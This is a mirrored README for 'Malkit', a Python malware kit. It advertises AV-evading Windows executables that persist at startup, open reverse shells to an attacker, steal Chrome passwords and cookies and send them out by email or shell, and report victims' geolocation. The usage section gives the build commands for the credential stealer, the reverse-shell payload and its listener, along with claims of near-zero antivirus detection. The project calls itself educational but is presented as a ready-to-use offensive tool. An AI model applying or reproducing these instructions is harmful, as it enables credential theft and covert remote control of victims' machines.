An open API service indexing awesome lists of open source software.

https://github.com/darkarp/malkit

Full malware Kit
https://github.com/darkarp/malkit

Last synced: over 1 year ago
JSON representation

Full malware Kit

Awesome Lists containing this project

README

          

Malkit - Full malware kit





Release

Build Status on CircleCI






Scrutinizer code quality (GitHub/Bitbucket)




GitHub issues


GitHub closed issues





Report Bug
·
Request Feature



## Table of Contents

* [About the Project](#about-the-project)
* [AV Detection](#av-detection)
* [Getting started](#getting-started)
* [Prerequisites](#dependencies-and-requirements)
* [Installation](#installation)
* [Usage](#usage)
* [Todo](#todo)
* [Errors, Bugs and Feature Requests](#errors-bugs-and-feature-requests)
* [Learn More](#learn-more)
* [License](#license)

## About The project
Malkit is a python-based console application that generates runtime-decrypted undetectable windows executables.
It has the following features:
- Copying itself into startup as a legitimate application
- Connecting back to an attacker via reverse shell
- Custom listener with upload, download and modular capability (in progress)
- Chromepass feature:
- Decrypt Chrome saved paswords ad well as all cookies
- Send a file with the login/password combinations remotely (email or reverse shell)
- Send a file with all the extracted cookies as well as another file with possible email-related cookies
- Custom icon
- Custom error message
- Accurate location reporting. It can detect and send back a victim's accurate geolocation (not ip-based) (X)
- Easy to use
- Completely undetectable by AV engines

Features marked with an X are still in development and aren't fully working but are already complete in internal testing.
### AV Detection!
Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed
- [From build_malware](https://www.virustotal.com/gui/file/61fc9c4ad472a240f4fd010958a0b0210f6513ed878bd47b90e25da871e52068/detection)
- [From build_chromepass](https://antiscan.me/scan/new/result?id=kmpsMNccfuRJ)
- Both scans yielded the result: 1/69 detections. The sole detection is a false positive by Sangfor Engine Zero. I tried submitting a simple hello world program for analysis and the same AV detected it as malware as well.
- This is an educational project first and foremost, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal

## Getting started

### Dependencies and Requirements

For this application you need:

* [Python] - Only tested on 3.7.5 on Anaconda environment but should work in 3.6+ (Doesn't work in 3.8 yet). No need to download it from here, just follow [Installation below](#installation)
* ~~[VS build tools] - This is required to build some requirements. Please download it, install it and restart your computer **BEFORE** proceding to [Installation](#installation)~~ No longer needed due to last update. However, should you not be able to install the `requirements.txt`, open the file and downgrade `pexe37` to `0.9.6.4` and `darkarp` to `3.4` (ONLY if you get errors when installing the `requirements.txt`. For now, just go to [Installation](#installation) )

### Installation

Chromepass requires [Python] 3.6+ to run.
It has been tested on a full anaconda installation but it doesn't necessariliy require it. It doesn't work with Python 3.8 yet
The instructions on the full setup are below.

**Setup Anaconda environment:**
- Visit [Anaconda](https://www.anaconda.com/distribution/#download-section) and download the graphical installer for windows.
- Run the installer and make sure you select the checkbox "Add conda to path", even though it isn't recommended.
- Open up a **new** powershell window **as administrator** and run:
- `Set-ExecutionPolicy RemoteSigned`
- Press `A` when it prompts you.
- Close this window
- Open up a normal powershell and enable conda to use it:
- `conda init powershell`
- Close and open a new powershell and update conda:
- `conda update conda`
- Create a new anaconda environment:
- `conda create -n malkit python=3.7`
- Activate your environment:
- `conda activate malkit`
- Note: Every time you open a new powershell and want to run malkit you need to activate your environment.

**Clone the Repository and access its directory:**
```powershell
> git clone https://github.com/darkarp/malkit.git
> cd malkit
```

**Install the dependencies:**

```powershell
> pip install -r requirements.txt
```

If any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+ < 3.8 (preferably 3.7.5).
If the errors persist, try:
```powershell
> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt
```
If any errors **still** persist, make sure you have the following installed:
* [VS build tools]

## Usage

* Show the help screen
- `python malkit.py -h`

```
usage: python malkit.py [-h] {build_listener, build_malware, build_chromepass} ...

positional arguments:
{build_listener, build_malware, build_chromepass}

optional arguments:
-h, --help show this help message and exit

```
* Access the help menu for individual arguments
- `python malkit.py build_chromepass -h`

```
usage: python malkit.py build_chromepass [-h] [--load] [--email] [--reverse_shell]
[--no_error]
[--errormsg Error message to appear]
[--address Email address to send details to, if Email was chosen]
[--port Port for reverse connection, if Reverse shell was chosen.]
[--host Host reverse connection, if Reverse shell was chosen.]

optional arguments:
-h, --help show this help message and exit
--load
--email
--reverse_shell
--no_error
--errormsg Error message to appear
--address Email address to send details to, if Email was chosen
--port Port for reverse connection, if Reverse shell was chosen.
--host Host reverse connection, if Reverse shell was chosen.

example:

python malkit.py build_chromepass --email --address myemail@gmail.com
python malkit.py build_chromepass --reverse_shell --host 127.0.0.1 -p 4444
python malkit.py build_chromepass --load myfile.conf
```

* Building an executable that grabs and sends chrome-saved passwords through email
- `python malkit.py build_chromepass --email --address youremailaddress@yourdomain.com`

* Creating a persistent reverse_shell with additional features
- `python malkit.py build_malware --host 127.0.0.1 -p 444`
- Replace the host with your external/internal ip as needed
- Replace the port as needed
- Make sure you build the listener as well and run it.

* Creating a listener for the malware
- `python malkit.py build_listener -p 444`
- This is the listener for the malware
- While in the shell, you can use the `list` command to see active sessions.
- You can interact with a session by using the command: `interact::SESSION_NUMBER` where `SESSION_NUMBER` is the number of the session you want to connect with.
- To go back into listener mode after interacting with a session, use the command ` MIT

[Python]:
[VS build tools]: